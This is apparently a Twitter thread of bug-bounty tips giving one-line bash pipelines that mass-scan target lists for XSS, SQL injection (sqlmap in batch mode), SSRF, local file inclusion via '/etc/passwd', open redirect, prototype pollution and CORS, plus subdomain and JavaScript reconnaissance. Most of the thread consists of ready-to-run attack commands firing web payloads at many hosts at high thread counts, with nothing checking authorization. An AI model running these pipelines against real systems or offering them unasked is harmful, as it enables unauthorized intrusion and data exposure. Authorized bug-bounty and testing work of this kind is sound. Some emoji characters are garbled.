Hossein NafisiAsl
Mar 16 • 13 tweets • 15 min read
#Secret2
Bug Bounty with One-Line Bash Scripts💵😎

You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
1/ #Secret2

🎯 Hunt #XSS:
πŸ‘‰πŸ» cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
πŸ‘‰πŸ» cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

2/ #Secret2

🎯 Hunt #SQLi:
πŸ‘‰πŸ»httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

3/ #Secret2

🎯 Hunt #SSRF:
πŸ‘‰πŸ»findomain -t target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace YOUR.burpcollaborator.net

4/ #Secret2

🎯 Hunt #LFI:
πŸ‘‰πŸ» gau vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

5/ #Secret2

🎯 Hunt #OpenRedirect:
πŸ‘‰πŸ» gau vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

6/

🎯 Hunt #PrototypePollution:
👉🏻 subfinder -d target.com | httpx -silent | sed 's/$/\/?__proto__[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS//g" | grep "VULN"

7/

🎯 Hunt #CORS:
πŸ‘‰πŸ» gau vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: evvil.com" -X GET $url) | if grep 'https://t.co/HWPPlCCXOJ'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

8/ #Secret2

🎯 Extract .js:
πŸ‘‰πŸ» echo target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew

9/ #Secret2

🎯 Extract URLs from comment:
πŸ‘‰πŸ» cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'

10/ #Secret2

🎯 Dump In-scope Assets from HackerOne:
πŸ‘‰πŸ» curl -sL github.com/arkadiyt/bount… | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]

11/ #Secret2

🎯 Find live host/domain/assets:
πŸ‘‰πŸ» subfinder -d vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

12/ #Secret2

🎯 Screenshot:
πŸ‘‰πŸ» assetfinder -subs-only target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
